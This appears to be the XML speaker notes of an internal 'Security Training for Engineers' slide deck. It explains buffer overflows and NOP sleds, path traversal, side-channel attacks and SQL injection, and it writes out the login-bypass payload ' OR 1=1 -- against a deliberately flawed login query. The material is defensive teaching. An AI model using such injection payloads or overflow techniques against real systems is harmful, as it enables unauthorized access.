          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2439" name="Shape 2439"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A buffer overflow is one of those vulnerabilities you hear about a lot. But what actually is it? Essentially it's when a piece of data is allowed to be stored somewhere it shouldn't be able to access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's look at a super contrived and completely silly example. Suppose I have an application where you can enter your name, and you get $5,000. It stores this information in a ledger. So in this case, it might be stored as a line that contains your name, and the amount I'm going to pay you.</a:t>
            </a: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6" name="Shape 2456"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2457" name="Shape 2457"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Suppose I now enter my name, but then a load of null values, followed by a much higher amount of money. If the ledger is susceptible to a buffer overflow, this would get stored and would look like I'm now owed that amount of money instead. We've effectively overwritten some data we shouldn't have been able to.</a:t>
            </a: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6" name="Shape 2466"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2467" name="Shape 2467"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So why does that matter? Well, let's switch to a much more realistic example, where instead of some text ledger, we're doing it with memory. Here we have an example buffer.</a:t>
            </a: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6" name="Shape 2476"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2477" name="Shape 2477"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Under normal operation, you'd type in some text and it would be stored in memory. In this case, the string "Peter" (null-terminated).</a:t>
            </a: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6" name="Shape 2486"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2487" name="Shape 2487"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>But if there's a buffer overflow vulnerability, we can overwrite the things after the buffer. Things like the return address, which tells the processor which bit of memory to start executing next.</a:t>
            </a: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6" name="Shape 2496"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2497" name="Shape 2497"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This allows us to write some processor instructions into memory, then point the return address to where we just wrote those things to. The instructions we just stored in memory will then get executed! This means we can pretty much do whatever we want on a system (get a root shell for example). But how do you know where to point the return address to? If you don't get it exactly right, it won't execute your code.</a:t>
            </a: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5" name="Shape 2505"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2506" name="Shape 2506"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>For that, we can use something called a NOP sled.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Shape 391"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's take a look at a quick example, using the query for a hypothetical (and very bad) login page. Seriously, never design a login page like this, I'm just using this as a contrived example to demonstrate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>When logging in, this will lookup the user record based on the username and password that is entered. If a result is returned, it will log that person in. Pretty simple, and there are actually login pages out there that work this way (unfortunately).</a:t>
            </a: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6" name="Shape 2546"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2547" name="Shape 2547"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A NOP sled is where you fill the buffer with NOPs (0x90 in Intel x86) before the code you want to run. You then just need to get a return address that goes to anywhere in that sequence of NOPs. You don't need to find an exact position, just anywhere in your sea of NOPs will work, since then the processor will just execute nothing all the way until it hits the code you wanted to execute. Very cool.</a:t>
            </a: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0" name="Shape 2560"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2561" name="Shape 2561"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If there's a buffer overflow vulnerability, you can essentially use this technique to get a root shell quite easily. The post linked here has lots of examples of this technique, called "Smashing the Stack", and I highly recommend giving it a read. The code example here is taken directly from there. Remember, don't just run random code from the internet, take a look at the article first and understand what's going on.</a:t>
            </a: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2" name="Shape 2572"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2573" name="Shape 2573"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Another classic vulnerability is called "path traversal". This is where you can escape out of the directory a web server is running from in order to access files from elsewhere on the filesystem. For example, you might be able to dump the list of users and their password hashes from a host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>One of our dependencies had a path traversal vulnerability a while back. It's important to remember that our dependencies can have vulnerabilities too, which is why we do vulnerability scanning on all the dependencies we use.</a:t>
            </a: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3" name="Shape 2583"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2584" name="Shape 2584"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Side-channel attacks are where you can use some information that's not normally part of an encryption process to infer some data and potentially compromise that process. There are a few different types, with the main ones being timing attacks, power analysis, acoustic cryptanalysis, and data remanence. Let's try and explain these in plain English.</a:t>
            </a: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4" name="Shape 2594"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2595" name="Shape 2595"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>timing attack</a:t>
            </a:r>
            <a:r>
              <a:t> is where you can use the timing of certain operations to infer data about what's happening. For example, if I know a multiplication takes twice as long to execute as an addition. I can perhaps infer the mathematical operations a processor is performing when it decrypts some data, and gain some insight into how the decryption works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Power analysis</a:t>
            </a:r>
            <a:r>
              <a:t> is really cool, it's where you can analyze the power consumption of a processor (or anything really), and figure out what it's doing behind the scenes. There's a technique called "Differential Power Analysis", which is where you can statistically figure out what is going on by taking lots of power measurements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Acoustic analysis</a:t>
            </a:r>
            <a:r>
              <a:t> is also really cool, and that's what the YouTube link at the bottom of this slide is an example of. This is where you can analyze sounds to figure out what is going on. For example, maybe I could place a microphone near you and figure out your password from the different sounds the keys on your keyboard make.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>Finally </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>data remanence</a:t>
            </a:r>
            <a:r>
              <a:t>, where you can recover sensitive data after it has supposedly been deleted. This is why you can find lots of "Secure Erase" tools which will overwrite your hard disk multiple times with random data, to prevent anything being able to be recovered later.</a:t>
            </a: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5" name="Shape 2605"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2606" name="Shape 2606"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If you're interested in some security history, or other classic vulnerabilities, there's some great material at these links.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The story of the NSA's involvement in the development of DES is particular interesting. Back in the 70's they basically stepped in and slightly modified DES before it was released and wouldn't tell anyone why. Naturally people were a little suspicious. 30 years later a new type of attack called differential cryptanalysis came to light, but it was found that DES was surprisingly resilient to it, it turns out due to the changes the NSA had made. They knew about the attack and wanted to make DES resilient to it, but couldn't tell anyone much more without revealing they knew about differential cryptanalysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>There's another fun story about how DirecTV managed to counteract some hacked satellite TV smart cards in what was called the "Black Sunday Hack". It's really interesting how they did it, by basically loading some code piece by piece over 60+ updates, which individually seemed innocuous, but when activated would make any hacked card completely unusable. They chose to activate the hack a week before the Super Bowl.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Anyway, lots of interesting reading!</a:t>
            </a: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6" name="Shape 2616"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2617" name="Shape 2617"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>And that's it! I know that was a huge amount of information to cover in such a short amount of time. But I hope that you all learned something useful, or at the very least had a good laugh at some of the jokes.</a:t>
            </a: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8" name="Shape 2628"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2629" name="Shape 2629"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Security is a huge topic, and there are lots of specialty areas. Here are a few books I thought would be most relevant to engineers, and ones I can wholeheartedly recommend. It's well worth using some of your training budget on them if you're interested in learning more.</a:t>
            </a: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4" name="Shape 2634"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2635" name="Shape 2635"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr i="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>These slides gave an overview of how folks can reach the security team, and links to our internal wiki pages, Slack rooms, and details on when we run office hours.</a:t>
            </a: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5" name="Shape 2645"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2646" name="Shape 2646"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So with that, I'll open it up to questions. Thanks very much!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Welcome to "Security Training for Engineers". This talk is specifically geared towards engineers, and is going to be a bit more technical than the last training. If you're not an engineer though, don't worry, you're more than welcome to stay. While the topics will be technical in nature, it should be informative no matter what your skill level is, whether you're just getting started, or are a seasoned engineer with years of experience.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>For those who've not met me yet, "Hi, I'm Rich". I work on security and incident response, and make lots of silly jokes. You'll get used to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Anyway, let's get stuck in.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Shape 421"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Shape 422"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So let's login with a real user to see how this works under normal conditions. The username and password get put into the query, which will then execute using those values.</a:t>
            </a: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4" name="Shape 2654"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2655" name="Shape 2655"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Image credits.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Shape 435"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 436"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The SQL statement is valid. The username and password are correct, so a single result is returned for the user, and they would now be logged in as this user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr i="1"/>
            </a:pPr>
            <a:r>
              <a:t>The keen eyed amongst you will have spotted that passwords should never be stored this way. We'll talk about properly storing passwords later. Remember, there's a big red icon in the corner here, never implement a login page like this!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OK, so that's all well and good. That's how the developer intended it to work.</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Shape 465"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Shape 466"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>But honest people aren't always going to be the ones using such a login form. Some users will be attackers, and they won't play by the rules. So let's say we have an attacker, and they now enter something like this instead. They have a username of admin, but a password of ' OR 1=1 --.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>As before, the username and password get replaced in the SQL statement. But something different has happened here. Because this code is susceptible to SQL injection, the query being executed has actually changed from what the developer wanted. You can see in the red box here that the SQL query is now different.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hape 477"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Shape 478"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This new SQL statement has an extra condition in it, which means this query will return the row for the admin user, even though the correct password wasn't entered. The query added an OR 1=1, which will always evaluate to true (since 1 is always equal to 1). Since OR true will always be true, it doesn't matter what else the user entered, they will automatically get the correct result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This user would now be logged in as an administrator even though they didn't know the password. That's not great.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Shape 496"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Shape 497"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
